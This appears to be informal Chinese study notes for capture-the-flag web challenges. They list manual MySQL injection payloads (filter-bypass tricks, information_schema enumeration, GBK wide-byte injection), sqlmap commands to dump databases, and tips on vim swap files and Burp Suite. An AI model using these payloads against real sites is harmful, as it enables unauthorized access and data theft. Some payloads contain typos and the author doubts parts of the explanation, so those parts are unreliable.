sql 手工注入：

繞過空格的方法：
+ %0a %0b /**/

mysql：

在mysql中，有一個庫叫做 information_schema，里面包含了數據庫中所有庫的信息，我們可以在注入的時候用它來做很多壞事情。

注入點的確定：

用select database() 來確定數據庫名稱 1’ union select database()’
調用information_schema 來查看所有信息，我們可以用它來做很多壞事
1’ union select table_name from information_schema.tables where table_schema =’ <數據表名>

有時候，會過濾掉你的關鍵詞，這時候，把關鍵詞打兩遍或許有奇效。

確定字段名
1’ union select column_name from informaiton_schema.columnsa where table_name=’<字段名>

確定字段名中的內容
1’ union select from where ‘1’=’1
1’ union//select//flag from//flag where//’1’=’1
<備注：我感覺用#不太好，因為會被過濾掉，還是上頭那個靠譜>
‘//union//select//flag//from/**/flag#

（注入點都用1’來代替了，具體操作都不一樣。明智的人應該懂得如何手注而不是用工具）

sqlmap 搞事：

sqlmap -u”” 直接查看嘛~~ 然后加上 –dbs 倒庫
（前提是你要找到注入點啊！！！）

找到庫了之后呢 就 sqlmap -u “” -D <表名> –tables
（備注 -D 是進入，–tables 能夠查看當前庫下的東西）

然后 sqlmap -u “” -D <表名> -T <字段> <字段> –dump
（備注 –dump 能夠把數據里的東西全部到出來）
（就是一次比較簡單的sqlmap搞事了）

寬字節與gbk編碼

注入 特征：

出現 11’ and 1=2 # 時候會變成
’ 1\’ and 1=2 # 為了把\給去掉
要改為 11%df%27 and 1=2 # /%df就是一個寬字節 %27 是引號
（可能這里理解有問題。。。。。。。。。。。。）
1’ union select 1,database()
%df’ union select 1,database() %23

關於寬字節的可以看看這里

vim的備份文件：

一些愚蠢的開發者會把vim的備份文件不刪掉，
用/.《name》.swp 訪問它

burpsuite：

簡單的抓包，截包，改包操作。
對於包的熟悉能夠讓你做很多事情
以后burp的功能會在做題中慢慢提升

PHP 超好用的在線編譯軟件：

http://www.shucunwang.com/RunCode/php/

php測試在線網站

就這樣隨意寫點覺得重要的知識點吧，可能有地方有錯誤的，歡迎指正哈哈。